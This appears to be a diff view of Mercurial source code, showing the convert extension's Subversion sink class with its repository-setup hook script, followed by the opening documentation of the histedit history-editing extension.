1256 # developer config: convert.svn.debugsvnlog
1266 # developer config: convert.svn.debugsvnlog
1257 if not self.ui.configbool(b'convert', b'svn.debugsvnlog'):
1267 if not self.ui.configbool(b'convert', b'svn.debugsvnlog'):
1258 return directlogstream(*args)
1268 return directlogstream(*args)
1259 arg = encodeargs(args)
1269 arg = encodeargs(args)
1260 hgexe = procutil.hgexecutable()
1270 hgexe = procutil.hgexecutable()
1261 cmd = b'%s debugsvnlog' % procutil.shellquote(hgexe)
1271 cmd = b'%s debugsvnlog' % procutil.shellquote(hgexe)
1262 stdin, stdout = procutil.popen2(cmd)
1272 stdin, stdout = procutil.popen2(cmd)
1263 stdin.write(arg)
1273 stdin.write(arg)
1264 try:
1274 try:
1265 stdin.close()
1275 stdin.close()
1266 except IOError:
1276 except IOError:
1267 raise error.Abort(
1277 raise error.Abort(
1268 _(
1278 _(
1269 b'Mercurial failed to run itself, check'
1279 b'Mercurial failed to run itself, check'
1270 b' hg executable is in PATH'
1280 b' hg executable is in PATH'
1271 )
1281 )
1272 )
1282 )
1273 return logstream(stdout)
1283 return logstream(stdout)
1274
1284
1275
1285
1276 pre_revprop_change = b'''#!/bin/sh
1286 pre_revprop_change = b'''#!/bin/sh
1277
1287
1278 REPOS="$1"
1288 REPOS="$1"
1279 REV="$2"
1289 REV="$2"
1280 USER="$3"
1290 USER="$3"
1281 PROPNAME="$4"
1291 PROPNAME="$4"
1282 ACTION="$5"
1292 ACTION="$5"
1283
1293
1284 if [ "$ACTION" = "M" -a "$PROPNAME" = "svn:log" ]; then exit 0; fi
1294 if [ "$ACTION" = "M" -a "$PROPNAME" = "svn:log" ]; then exit 0; fi
1285 if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-branch" ]; then exit 0; fi
1295 if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-branch" ]; then exit 0; fi
1286 if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-rev" ]; then exit 0; fi
1296 if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-rev" ]; then exit 0; fi
1287
1297
1288 echo "Changing prohibited revision property" >&2
1298 echo "Changing prohibited revision property" >&2
1289 exit 1
1299 exit 1
1290 '''
1300 '''
1291
1301
1292
1302
1293 class svn_sink(converter_sink, commandline):
1303 class svn_sink(converter_sink, commandline):
1294 commit_re = re.compile(br'Committed revision (\d+).', re.M)
1304 commit_re = re.compile(br'Committed revision (\d+).', re.M)
1295 uuid_re = re.compile(br'Repository UUID:\s*(\S+)', re.M)
1305 uuid_re = re.compile(br'Repository UUID:\s*(\S+)', re.M)
1296
1306
1297 def prerun(self):
1307 def prerun(self):
1298 if self.wc:
1308 if self.wc:
1299 os.chdir(self.wc)
1309 os.chdir(self.wc)
1300
1310
1301 def postrun(self):
1311 def postrun(self):
1302 if self.wc:
1312 if self.wc:
1303 os.chdir(self.cwd)
1313 os.chdir(self.cwd)
1304
1314
1305 def join(self, name):
1315 def join(self, name):
1306 return os.path.join(self.wc, b'.svn', name)
1316 return os.path.join(self.wc, b'.svn', name)
1307
1317
1308 def revmapfile(self):
1318 def revmapfile(self):
1309 return self.join(b'hg-shamap')
1319 return self.join(b'hg-shamap')
1310
1320
1311 def authorfile(self):
1321 def authorfile(self):
1312 return self.join(b'hg-authormap')
1322 return self.join(b'hg-authormap')
1313
1323
1314 def __init__(self, ui, repotype, path):
1324 def __init__(self, ui, repotype, path):
1315
1325
1316 converter_sink.__init__(self, ui, repotype, path)
1326 converter_sink.__init__(self, ui, repotype, path)
1317 commandline.__init__(self, ui, b'svn')
1327 commandline.__init__(self, ui, b'svn')
1318 self.delete = []
1328 self.delete = []
1319 self.setexec = []
1329 self.setexec = []
1320 self.delexec = []
1330 self.delexec = []
1321 self.copies = []
1331 self.copies = []
1322 self.wc = None
1332 self.wc = None
1323 self.cwd = encoding.getcwd()
1333 self.cwd = encoding.getcwd()
1324
1334
1325 created = False
1335 created = False
1326 if os.path.isfile(os.path.join(path, b'.svn', b'entries')):
1336 if os.path.isfile(os.path.join(path, b'.svn', b'entries')):
1327 self.wc = os.path.realpath(path)
1337 self.wc = os.path.realpath(path)
1328 self.run0(b'update')
1338 self.run0(b'update')
1329 else:
1339 else:
1330 if not re.search(br'^(file|http|https|svn|svn\+ssh)://', path):
1340 if not re.search(br'^(file|http|https|svn|svn\+ssh)://', path):
1331 path = os.path.realpath(path)
1341 path = os.path.realpath(path)
1332 if os.path.isdir(os.path.dirname(path)):
1342 if os.path.isdir(os.path.dirname(path)):
1333 if not os.path.exists(
1343 if not os.path.exists(
1334 os.path.join(path, b'db', b'fs-type')
1344 os.path.join(path, b'db', b'fs-type')
1335 ):
1345 ):
1336 ui.status(
1346 ui.status(
1337 _(b"initializing svn repository '%s'\n")
1347 _(b"initializing svn repository '%s'\n")
1338 % os.path.basename(path)
1348 % os.path.basename(path)
1339 )
1349 )
1340 commandline(ui, b'svnadmin').run0(b'create', path)
1350 commandline(ui, b'svnadmin').run0(b'create', path)
1341 created = path
1351 created = path
1342 path = util.normpath(path)
1352 path = util.normpath(path)
1343 if not path.startswith(b'/'):
1353 if not path.startswith(b'/'):
1344 path = b'/' + path
1354 path = b'/' + path
1345 path = b'file://' + path
1355 path = b'file://' + path
1346
1356
1347 wcpath = os.path.join(
1357 wcpath = os.path.join(
1348 encoding.getcwd(), os.path.basename(path) + b'-wc'
1358 encoding.getcwd(), os.path.basename(path) + b'-wc'
1349 )
1359 )
1350 ui.status(
1360 ui.status(
1351 _(b"initializing svn working copy '%s'\n")
1361 _(b"initializing svn working copy '%s'\n")
1352 % os.path.basename(wcpath)
1362 % os.path.basename(wcpath)
1353 )
1363 )
1354 self.run0(b'checkout', path, wcpath)
1364 self.run0(b'checkout', path, wcpath)
1355
1365
1356 self.wc = wcpath
1366 self.wc = wcpath
1357 self.opener = vfsmod.vfs(self.wc)
1367 self.opener = vfsmod.vfs(self.wc)
1358 self.wopener = vfsmod.vfs(self.wc)
1368 self.wopener = vfsmod.vfs(self.wc)
1359 self.childmap = mapfile(ui, self.join(b'hg-childmap'))
1369 self.childmap = mapfile(ui, self.join(b'hg-childmap'))
1360 if util.checkexec(self.wc):
1370 if util.checkexec(self.wc):
1361 self.is_exec = util.isexec
1371 self.is_exec = util.isexec
1362 else:
1372 else:
1363 self.is_exec = None
1373 self.is_exec = None
1364
1374
1365 if created:
1375 if created:
1366 hook = os.path.join(created, b'hooks', b'pre-revprop-change')
1376 hook = os.path.join(created, b'hooks', b'pre-revprop-change')
1367 fp = open(hook, b'wb')
1377 fp = open(hook, b'wb')
1368 fp.write(pre_revprop_change)
1378 fp.write(pre_revprop_change)
1369 fp.close()
1379 fp.close()
1370 util.setflags(hook, False, True)
1380 util.setflags(hook, False, True)
1371
1381
1372 output = self.run0(b'info')
1382 output = self.run0(b'info')
1373 self.uuid = self.uuid_re.search(output).group(1).strip()
1383 self.uuid = self.uuid_re.search(output).group(1).strip()
1374
1384
1375 def wjoin(self, *names):
1385 def wjoin(self, *names):
1376 return os.path.join(self.wc, *names)
1386 return os.path.join(self.wc, *names)
1377
1387
1378 @propertycache
1388 @propertycache
1379 def manifest(self):
1389 def manifest(self):
1380 # As of svn 1.7, the "add" command fails when receiving
1390 # As of svn 1.7, the "add" command fails when receiving
1381 # already tracked entries, so we have to track and filter them
1391 # already tracked entries, so we have to track and filter them
1382 # ourselves.
1392 # ourselves.
1383 m = set()
1393 m = set()
1384 output = self.run0(b'ls', recursive=True, xml=True)
1394 output = self.run0(b'ls', recursive=True, xml=True)
1385 doc = xml.dom.minidom.parseString(output)
1395 doc = xml.dom.minidom.parseString(output)
1386 for e in doc.getElementsByTagName('entry'):
1396 for e in doc.getElementsByTagName('entry'):
1387 for n in e.childNodes:
1397 for n in e.childNodes:
1388 if n.nodeType != n.ELEMENT_NODE or n.tagName != 'name':
1398 if n.nodeType != n.ELEMENT_NODE or n.tagName != 'name':
1389 continue
1399 continue
1390 name = ''.join(
1400 name = ''.join(
1391 c.data for c in n.childNodes if c.nodeType == c.TEXT_NODE
1401 c.data for c in n.childNodes if c.nodeType == c.TEXT_NODE
1392 )
1402 )
1393 # Entries are compared with names coming from
1403 # Entries are compared with names coming from
1394 # mercurial, so bytes with undefined encoding. Our
1404 # mercurial, so bytes with undefined encoding. Our
1395 # best bet is to assume they are in local
1405 # best bet is to assume they are in local
1396 # encoding. They will be passed to command line calls
1406 # encoding. They will be passed to command line calls
1397 # later anyway, so they better be.
1407 # later anyway, so they better be.
1398 m.add(encoding.unitolocal(name))
1408 m.add(encoding.unitolocal(name))
1399 break
1409 break
1400 return m
1410 return m
1401
1411
1402 def putfile(self, filename, flags, data):
1412 def putfile(self, filename, flags, data):
1403 if b'l' in flags:
1413 if b'l' in flags:
1404 self.wopener.symlink(data, filename)
1414 self.wopener.symlink(data, filename)
1405 else:
1415 else:
1406 try:
1416 try:
1407 if os.path.islink(self.wjoin(filename)):
1417 if os.path.islink(self.wjoin(filename)):
1408 os.unlink(filename)
1418 os.unlink(filename)
1409 except OSError:
1419 except OSError:
1410 pass
1420 pass
1411
1421
1412 if self.is_exec:
1422 if self.is_exec:
1413 # We need to check executability of the file before the change,
1423 # We need to check executability of the file before the change,
1414 # because `vfs.write` is able to reset exec bit.
1424 # because `vfs.write` is able to reset exec bit.
1415 wasexec = False
1425 wasexec = False
1416 if os.path.exists(self.wjoin(filename)):
1426 if os.path.exists(self.wjoin(filename)):
1417 wasexec = self.is_exec(self.wjoin(filename))
1427 wasexec = self.is_exec(self.wjoin(filename))
1418
1428
1419 self.wopener.write(filename, data)
1429 self.wopener.write(filename, data)
1420
1430
1421 if self.is_exec:
1431 if self.is_exec:
1422 if wasexec:
1432 if wasexec:
1423 if b'x' not in flags:
1433 if b'x' not in flags:
1424 self.delexec.append(filename)
1434 self.delexec.append(filename)
1425 else:
1435 else:
1426 if b'x' in flags:
1436 if b'x' in flags:
1427 self.setexec.append(filename)
1437 self.setexec.append(filename)
1428 util.setflags(self.wjoin(filename), False, b'x' in flags)
1438 util.setflags(self.wjoin(filename), False, b'x' in flags)
1429
1439
1430 def _copyfile(self, source, dest):
1440 def _copyfile(self, source, dest):
1431 # SVN's copy command pukes if the destination file exists, but
1441 # SVN's copy command pukes if the destination file exists, but
1432 # our copyfile method expects to record a copy that has
1442 # our copyfile method expects to record a copy that has
1433 # already occurred. Cross the semantic gap.
1443 # already occurred. Cross the semantic gap.
1434 wdest = self.wjoin(dest)
1444 wdest = self.wjoin(dest)
1435 exists = os.path.lexists(wdest)
1445 exists = os.path.lexists(wdest)
1436 if exists:
1446 if exists:
1437 fd, tempname = pycompat.mkstemp(
1447 fd, tempname = pycompat.mkstemp(
1438 prefix=b'hg-copy-', dir=os.path.dirname(wdest)
1448 prefix=b'hg-copy-', dir=os.path.dirname(wdest)
1439 )
1449 )
1440 os.close(fd)
1450 os.close(fd)
1441 os.unlink(tempname)
1451 os.unlink(tempname)
1442 os.rename(wdest, tempname)
1452 os.rename(wdest, tempname)
1443 try:
1453 try:
1444 self.run0(b'copy', source, dest)
1454 self.run0(b'copy', source, dest)
1445 finally:
1455 finally:
1446 self.manifest.add(dest)
1456 self.manifest.add(dest)
1447 if exists:
1457 if exists:
1448 try:
1458 try:
1449 os.unlink(wdest)
1459 os.unlink(wdest)
1450 except OSError:
1460 except OSError:
1451 pass
1461 pass
1452 os.rename(tempname, wdest)
1462 os.rename(tempname, wdest)
1453
1463
1454 def dirs_of(self, files):
1464 def dirs_of(self, files):
1455 dirs = set()
1465 dirs = set()
1456 for f in files:
1466 for f in files:
1457 if os.path.isdir(self.wjoin(f)):
1467 if os.path.isdir(self.wjoin(f)):
1458 dirs.add(f)
1468 dirs.add(f)
1459 i = len(f)
1469 i = len(f)
1460 for i in iter(lambda: f.rfind(b'/', 0, i), -1):
1470 for i in iter(lambda: f.rfind(b'/', 0, i), -1):
1461 dirs.add(f[:i])
1471 dirs.add(f[:i])
1462 return dirs
1472 return dirs
1463
1473
1464 def add_dirs(self, files):
1474 def add_dirs(self, files):
1465 add_dirs = [
1475 add_dirs = [
1466 d for d in sorted(self.dirs_of(files)) if d not in self.manifest
1476 d for d in sorted(self.dirs_of(files)) if d not in self.manifest
1467 ]
1477 ]
1468 if add_dirs:
1478 if add_dirs:
1469 self.manifest.update(add_dirs)
1479 self.manifest.update(add_dirs)
1470 self.xargs(add_dirs, b'add', non_recursive=True, quiet=True)
1480 self.xargs(add_dirs, b'add', non_recursive=True, quiet=True)
1471 return add_dirs
1481 return add_dirs
1472
1482
1473 def add_files(self, files):
1483 def add_files(self, files):
1474 files = [f for f in files if f not in self.manifest]
1484 files = [f for f in files if f not in self.manifest]
1475 if files:
1485 if files:
1476 self.manifest.update(files)
1486 self.manifest.update(files)
1477 self.xargs(files, b'add', quiet=True)
1487 self.xargs(files, b'add', quiet=True)
1478 return files
1488 return files
1479
1489
1480 def addchild(self, parent, child):
1490 def addchild(self, parent, child):
1481 self.childmap[parent] = child
1491 self.childmap[parent] = child
1482
1492
1483 def revid(self, rev):
1493 def revid(self, rev):
1484 return b"svn:%s@%s" % (self.uuid, rev)
1494 return b"svn:%s@%s" % (self.uuid, rev)
1485
1495
1486 def putcommit(
1496 def putcommit(
1487 self, files, copies, parents, commit, source, revmap, full, cleanp2
1497 self, files, copies, parents, commit, source, revmap, full, cleanp2
1488 ):
1498 ):
1489 for parent in parents:
1499 for parent in parents:
1490 try:
1500 try:
1491 return self.revid(self.childmap[parent])
1501 return self.revid(self.childmap[parent])
1492 except KeyError:
1502 except KeyError:
1493 pass
1503 pass
1494
1504
1495 # Apply changes to working copy
1505 # Apply changes to working copy
1496 for f, v in files:
1506 for f, v in files:
1497 data, mode = source.getfile(f, v)
1507 data, mode = source.getfile(f, v)
1498 if data is None:
1508 if data is None:
1499 self.delete.append(f)
1509 self.delete.append(f)
1500 else:
1510 else:
1501 self.putfile(f, mode, data)
1511 self.putfile(f, mode, data)
1502 if f in copies:
1512 if f in copies:
1503 self.copies.append([copies[f], f])
1513 self.copies.append([copies[f], f])
1504 if full:
1514 if full:
1505 self.delete.extend(sorted(self.manifest.difference(files)))
1515 self.delete.extend(sorted(self.manifest.difference(files)))
1506 files = [f[0] for f in files]
1516 files = [f[0] for f in files]
1507
1517
1508 entries = set(self.delete)
1518 entries = set(self.delete)
1509 files = frozenset(files)
1519 files = frozenset(files)
1510 entries.update(self.add_dirs(files.difference(entries)))
1520 entries.update(self.add_dirs(files.difference(entries)))
1511 if self.copies:
1521 if self.copies:
1512 for s, d in self.copies:
1522 for s, d in self.copies:
1513 self._copyfile(s, d)
1523 self._copyfile(s, d)
1514 self.copies = []
1524 self.copies = []
1515 if self.delete:
1525 if self.delete:
1516 self.xargs(self.delete, b'delete')
1526 self.xargs(self.delete, b'delete')
1517 for f in self.delete:
1527 for f in self.delete:
1518 self.manifest.remove(f)
1528 self.manifest.remove(f)
1519 self.delete = []
1529 self.delete = []
1520 entries.update(self.add_files(files.difference(entries)))
1530 entries.update(self.add_files(files.difference(entries)))
1521 if self.delexec:
1531 if self.delexec:
1522 self.xargs(self.delexec, b'propdel', b'svn:executable')
1532 self.xargs(self.delexec, b'propdel', b'svn:executable')
1523 self.delexec = []
1533 self.delexec = []
1524 if self.setexec:
1534 if self.setexec:
1525 self.xargs(self.setexec, b'propset', b'svn:executable', b'*')
1535 self.xargs(self.setexec, b'propset', b'svn:executable', b'*')
1526 self.setexec = []
1536 self.setexec = []
1527
1537
1528 fd, messagefile = pycompat.mkstemp(prefix=b'hg-convert-')
1538 fd, messagefile = pycompat.mkstemp(prefix=b'hg-convert-')
1529 fp = os.fdopen(fd, 'wb')
1539 fp = os.fdopen(fd, 'wb')
1530 fp.write(util.tonativeeol(commit.desc))
1540 fp.write(util.tonativeeol(commit.desc))
1531 fp.close()
1541 fp.close()
1532 try:
1542 try:
1533 output = self.run0(
1543 output = self.run0(
1534 b'commit',
1544 b'commit',
1535 username=stringutil.shortuser(commit.author),
1545 username=stringutil.shortuser(commit.author),
1536 file=messagefile,
1546 file=messagefile,
1537 encoding=b'utf-8',
1547 encoding=b'utf-8',
1538 )
1548 )
1539 try:
1549 try:
1540 rev = self.commit_re.search(output).group(1)
1550 rev = self.commit_re.search(output).group(1)
1541 except AttributeError:
1551 except AttributeError:
1542 if not files:
1552 if not files:
1543 return parents[0] if parents else b'None'
1553 return parents[0] if parents else b'None'
1544 self.ui.warn(_(b'unexpected svn output:\n'))
1554 self.ui.warn(_(b'unexpected svn output:\n'))
1545 self.ui.warn(output)
1555 self.ui.warn(output)
1546 raise error.Abort(_(b'unable to cope with svn output'))
1556 raise error.Abort(_(b'unable to cope with svn output'))
1547 if commit.rev:
1557 if commit.rev:
1548 self.run(
1558 self.run(
1549 b'propset',
1559 b'propset',
1550 b'hg:convert-rev',
1560 b'hg:convert-rev',
1551 commit.rev,
1561 commit.rev,
1552 revprop=True,
1562 revprop=True,
1553 revision=rev,
1563 revision=rev,
1554 )
1564 )
1555 if commit.branch and commit.branch != b'default':
1565 if commit.branch and commit.branch != b'default':
1556 self.run(
1566 self.run(
1557 b'propset',
1567 b'propset',
1558 b'hg:convert-branch',
1568 b'hg:convert-branch',
1559 commit.branch,
1569 commit.branch,
1560 revprop=True,
1570 revprop=True,
1561 revision=rev,
1571 revision=rev,
1562 )
1572 )
1563 for parent in parents:
1573 for parent in parents:
1564 self.addchild(parent, rev)
1574 self.addchild(parent, rev)
1565 return self.revid(rev)
1575 return self.revid(rev)
1566 finally:
1576 finally:
1567 os.unlink(messagefile)
1577 os.unlink(messagefile)
1568
1578
1569 def puttags(self, tags):
1579 def puttags(self, tags):
1570 self.ui.warn(_(b'writing Subversion tags is not yet implemented\n'))
1580 self.ui.warn(_(b'writing Subversion tags is not yet implemented\n'))
1571 return None, None
1581 return None, None
1572
1582
1573 def hascommitfrommap(self, rev):
1583 def hascommitfrommap(self, rev):
1574 # We trust that revisions referenced in a map still is present
1584 # We trust that revisions referenced in a map still is present
1575 # TODO: implement something better if necessary and feasible
1585 # TODO: implement something better if necessary and feasible
1576 return True
1586 return True
1577
1587
1578 def hascommitforsplicemap(self, rev):
1588 def hascommitforsplicemap(self, rev):
1579 # This is not correct as one can convert to an existing subversion
1589 # This is not correct as one can convert to an existing subversion
1580 # repository and childmap would not list all revisions. Too bad.
1590 # repository and childmap would not list all revisions. Too bad.
1581 if rev in self.childmap:
1591 if rev in self.childmap:
1582 return True
1592 return True
1583 raise error.Abort(
1593 raise error.Abort(
1584 _(
1594 _(
1585 b'splice map revision %s not found in subversion '
1595 b'splice map revision %s not found in subversion '
1586 b'child map (revision lookups are not implemented)'
1596 b'child map (revision lookups are not implemented)'
1587 )
1597 )
1588 % rev
1598 % rev
1589 )
1599 )
@@ -1,2645 +1,2641 b''
1 # histedit.py - interactive history editing for mercurial
1 # histedit.py - interactive history editing for mercurial
2 #
2 #
3 # Copyright 2009 Augie Fackler <raf@durin42.com>
3 # Copyright 2009 Augie Fackler <raf@durin42.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7 """interactive history editing
7 """interactive history editing
8
8
9 With this extension installed, Mercurial gains one new command: histedit. Usage
9 With this extension installed, Mercurial gains one new command: histedit. Usage
10 is as follows, assuming the following history::
10 is as follows, assuming the following history::
11
11
12 @ 3[tip] 7c2fd3b9020c 2009-04-27 18:04 -0500 durin42
12 @ 3[tip] 7c2fd3b9020c 2009-04-27 18:04 -0500 durin42
13 | Add delta
13 | Add delta
14 |
14 |
15 o 2 030b686bedc4 2009-04-27 18:04 -0500 durin42
15 o 2 030b686bedc4 2009-04-27 18:04 -0500 durin42
16 | Add gamma
16 | Add gamma
17 |
17 |
18 o 1 c561b4e977df 2009-04-27 18:04 -0500 durin42
18 o 1 c561b4e977df 2009-04-27 18:04 -0500 durin42
19 | Add beta
19 | Add beta
20 |
20 |
21 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
21 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
22 Add alpha
22 Add alpha
23
23
24 If you were to run ``hg histedit c561b4e977df``, you would see the following
24 If you were to run ``hg histedit c561b4e977df``, you would see the following
25 file open in your editor::
25 file open in your editor::
26
26
27 pick c561b4e977df Add beta
27 pick c561b4e977df Add beta
28 pick 030b686bedc4 Add gamma
28 pick 030b686bedc4 Add gamma
29 pick 7c2fd3b9020c Add delta
29 pick 7c2fd3b9020c Add delta
30
30
31 # Edit history between c561b4e977df and 7c2fd3b9020c
31 # Edit history between c561b4e977df and 7c2fd3b9020c
32 #
32 #
33 # Commits are listed from least to most recent
33 # Commits are listed from least to most recent
34 #
34 #
35 # Commands:
35 # Commands:
36 # p, pick = use commit
36 # p, pick = use commit
37 # e, edit = use commit, but stop for amending
37 # e, edit = use commit, but stop for amending
38 # f, fold = use commit, but combine it with the one above
38 # f, fold = use commit, but combine it with the one above
39 # r, roll = like fold, but discard this commit's description and date
39 # r, roll = like fold, but discard this commit's description and date
40 # d, drop = remove commit from history
40 # d, drop = remove commit from history
41 # m, mess = edit commit message without changing commit content
41 # m, mess = edit commit message without changing commit content
42 # b, base = checkout changeset and apply further changesets from there
42 # b, base = checkout changeset and apply further changesets from there
43 #
43 #
44
44
45 In this file, lines beginning with ``#`` are ignored. You must specify a rule
45 In this file, lines beginning with ``#`` are ignored. You must specify a rule
46 for each revision in your history. For example, if you had meant to add gamma
46 for each revision in your history. For example, if you had meant to add gamma
47 before beta, and then wanted to add delta in the same revision as beta, you
47 before beta, and then wanted to add delta in the same revision as beta, you
48 would reorganize the file to look like this::
48 would reorganize the file to look like this::
49
49
50 pick 030b686bedc4 Add gamma
50 pick 030b686bedc4 Add gamma
51 pick c561b4e977df Add beta
51 pick c561b4e977df Add beta
52 fold 7c2fd3b9020c Add delta
52 fold 7c2fd3b9020c Add delta
53
53
54 # Edit history between c561b4e977df and 7c2fd3b9020c
54 # Edit history between c561b4e977df and 7c2fd3b9020c
55 #
55 #
56 # Commits are listed from least to most recent
56 # Commits are listed from least to most recent
57 #
57 #
58 # Commands:
58 # Commands:
59 # p, pick = use commit
59 # p, pick = use commit
60 # e, edit = use commit, but stop for amending
60 # e, edit = use commit, but stop for amending
61 # f, fold = use commit, but combine it with the one above
61 # f, fold = use commit, but combine it with the one above
62 # r, roll = like fold, but discard this commit's description and date
62 # r, roll = like fold, but discard this commit's description and date
63 # d, drop = remove commit from history
63 # d, drop = remove commit from history
64 # m, mess = edit commit message without changing commit content
64 # m, mess = edit commit message without changing commit content
65 # b, base = checkout changeset and apply further changesets from there
65 # b, base = checkout changeset and apply further changesets from there
66 #
66 #
67
67
68 At which point you close the editor and ``histedit`` starts working. When you
68 At which point you close the editor and ``histedit`` starts working. When you
69 specify a ``fold`` operation, ``histedit`` will open an editor when it folds
69 specify a ``fold`` operation, ``histedit`` will open an editor when it folds
70 those revisions together, offering you a chance to clean up the commit message::
70 those revisions together, offering you a chance to clean up the commit message::
71
71
72 Add beta
72 Add beta
73 ***
73 ***
74 Add delta
74 Add delta
75
75
76 Edit the commit message to your liking, then close the editor. The date used
76 Edit the commit message to your liking, then close the editor. The date used
77 for the commit will be the later of the two commits' dates. For this example,
77 for the commit will be the later of the two commits' dates. For this example,
78 let's assume that the commit message was changed to ``Add beta and delta.``
78 let's assume that the commit message was changed to ``Add beta and delta.``
79 After histedit has run and had a chance to remove any old or temporary
79 After histedit has run and had a chance to remove any old or temporary
80 revisions it needed, the history looks like this::
80 revisions it needed, the history looks like this::
81
81
82 @ 2[tip] 989b4d060121 2009-04-27 18:04 -0500 durin42
82 @ 2[tip] 989b4d060121 2009-04-27 18:04 -0500 durin42
83 | Add beta and delta.
83 | Add beta and delta.
84 |
84 |
85 o 1 081603921c3f 2009-04-27 18:04 -0500 durin42
85 o 1 081603921c3f 2009-04-27 18:04 -0500 durin42
86 | Add gamma
86 | Add gamma
87 |
87 |
88 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
88 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
89 Add alpha
89 Add alpha
90
90
91 Note that ``histedit`` does *not* remove any revisions (even its own temporary
91 Note that ``histedit`` does *not* remove any revisions (even its own temporary
92 ones) until after it has completed all the editing operations, so it will
92 ones) until after it has completed all the editing operations, so it will
93 probably perform several strip operations when it's done. For the above example,
93 probably perform several strip operations when it's done. For the above example,
94 it had to run strip twice. Strip can be slow depending on a variety of factors,
94 it had to run strip twice. Strip can be slow depending on a variety of factors,
95 so you might need to be a little patient. You can choose to keep the original
95 so you might need to be a little patient. You can choose to keep the original
96 revisions by passing the ``--keep`` flag.
96 revisions by passing the ``--keep`` flag.
97
97
98 The ``edit`` operation will drop you back to a command prompt,
98 The ``edit`` operation will drop you back to a command prompt,
99 allowing you to edit files freely, or even use ``hg record`` to commit
99 allowing you to edit files freely, or even use ``hg record`` to commit
100 some changes as a separate commit. When you're done, any remaining
100 some changes as a separate commit. When you're done, any remaining
101 uncommitted changes will be committed as well. When done, run ``hg
101 uncommitted changes will be committed as well. When done, run ``hg
102 histedit --continue`` to finish this step. If there are uncommitted
102 histedit --continue`` to finish this step. If there are uncommitted
103 changes, you'll be prompted for a new commit message, but the default
103 changes, you'll be prompted for a new commit message, but the default
104 commit message will be the original message for the ``edit`` ed
104 commit message will be the original message for the ``edit`` ed
105 revision, and the date of the original commit will be preserved.
105 revision, and the date of the original commit will be preserved.
106
106
107 The ``message`` operation will give you a chance to revise a commit
107 The ``message`` operation will give you a chance to revise a commit
108 message without changing the contents. It's a shortcut for doing
108 message without changing the contents. It's a shortcut for doing
109 ``edit`` immediately followed by `hg histedit --continue``.
109 ``edit`` immediately followed by `hg histedit --continue``.
110
110
111 If ``histedit`` encounters a conflict when moving a revision (while
111 If ``histedit`` encounters a conflict when moving a revision (while
112 handling ``pick`` or ``fold``), it'll stop in a similar manner to
112 handling ``pick`` or ``fold``), it'll stop in a similar manner to
113 ``edit`` with the difference that it won't prompt you for a commit
113 ``edit`` with the difference that it won't prompt you for a commit
114 message when done. If you decide at this point that you don't like how
114 message when done. If you decide at this point that you don't like how
115 much work it will be to rearrange history, or that you made a mistake,
115 much work it will be to rearrange history, or that you made a mistake,
116 you can use ``hg histedit --abort`` to abandon the new changes you
116 you can use ``hg histedit --abort`` to abandon the new changes you
117 have made and return to the state before you attempted to edit your
117 have made and return to the state before you attempted to edit your
118 history.
118 history.
119
119
120 If we clone the histedit-ed example repository above and add four more
120 If we clone the histedit-ed example repository above and add four more
121 changes, such that we have the following history::
121 changes, such that we have the following history::
122
122
123 @ 6[tip] 038383181893 2009-04-27 18:04 -0500 stefan
123 @ 6[tip] 038383181893 2009-04-27 18:04 -0500 stefan
124 | Add theta
124 | Add theta
125 |
125 |
126 o 5 140988835471 2009-04-27 18:04 -0500 stefan
126 o 5 140988835471 2009-04-27 18:04 -0500 stefan
127 | Add eta
127 | Add eta
128 |
128 |
129 o 4 122930637314 2009-04-27 18:04 -0500 stefan
129 o 4 122930637314 2009-04-27 18:04 -0500 stefan
130 | Add zeta
130 | Add zeta
131 |
131 |
132 o 3 836302820282 2009-04-27 18:04 -0500 stefan
132 o 3 836302820282 2009-04-27 18:04 -0500 stefan
133 | Add epsilon
133 | Add epsilon
134 |
134 |
135 o 2 989b4d060121 2009-04-27 18:04 -0500 durin42
135 o 2 989b4d060121 2009-04-27 18:04 -0500 durin42
136 | Add beta and delta.
136 | Add beta and delta.
137 |
137 |
138 o 1 081603921c3f 2009-04-27 18:04 -0500 durin42
138 o 1 081603921c3f 2009-04-27 18:04 -0500 durin42
139 | Add gamma
139 | Add gamma
140 |
140 |
141 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
141 o 0 d8d2fcd0e319 2009-04-27 18:04 -0500 durin42
142 Add alpha
142 Add alpha
143
143
144 If you run ``hg histedit --outgoing`` on the clone then it is the same
144 If you run ``hg histedit --outgoing`` on the clone then it is the same
145 as running ``hg histedit 836302820282``. If you need plan to push to a
145 as running ``hg histedit 836302820282``. If you need plan to push to a
146 repository that Mercurial does not detect to be related to the source
146 repository that Mercurial does not detect to be related to the source
147 repo, you can add a ``--force`` option.
147 repo, you can add a ``--force`` option.
148
148
149 Config
149 Config
150 ------
150 ------
151
151
152 Histedit rule lines are truncated to 80 characters by default. You
152 Histedit rule lines are truncated to 80 characters by default. You
153 can customize this behavior by setting a different length in your
153 can customize this behavior by setting a different length in your
154 configuration file::
154 configuration file::
155
155
156 [histedit]
156 [histedit]
157 linelen = 120 # truncate rule lines at 120 characters
157 linelen = 120 # truncate rule lines at 120 characters
158
158
159 The summary of a change can be customized as well::
159 The summary of a change can be customized as well::
160
160
161 [histedit]
161 [histedit]
162 summary-template = '{rev} {bookmarks} {desc|firstline}'
162 summary-template = '{rev} {bookmarks} {desc|firstline}'
163
163
164 The customized summary should be kept short enough that rule lines
164 The customized summary should be kept short enough that rule lines
165 will fit in the configured line length. See above if that requires
165 will fit in the configured line length. See above if that requires
166 customization.
166 customization.
167
167
168 ``hg histedit`` attempts to automatically choose an appropriate base
168 ``hg histedit`` attempts to automatically choose an appropriate base
169 revision to use. To change which base revision is used, define a
169 revision to use. To change which base revision is used, define a
170 revset in your configuration file::
170 revset in your configuration file::
171
171
172 [histedit]
172 [histedit]
173 defaultrev = only(.) & draft()
173 defaultrev = only(.) & draft()
174
174
175 By default each edited revision needs to be present in histedit commands.
175 By default each edited revision needs to be present in histedit commands.
176 To remove revision you need to use ``drop`` operation. You can configure
176 To remove revision you need to use ``drop`` operation. You can configure
177 the drop to be implicit for missing commits by adding::
177 the drop to be implicit for missing commits by adding::
178
178
179 [histedit]
179 [histedit]
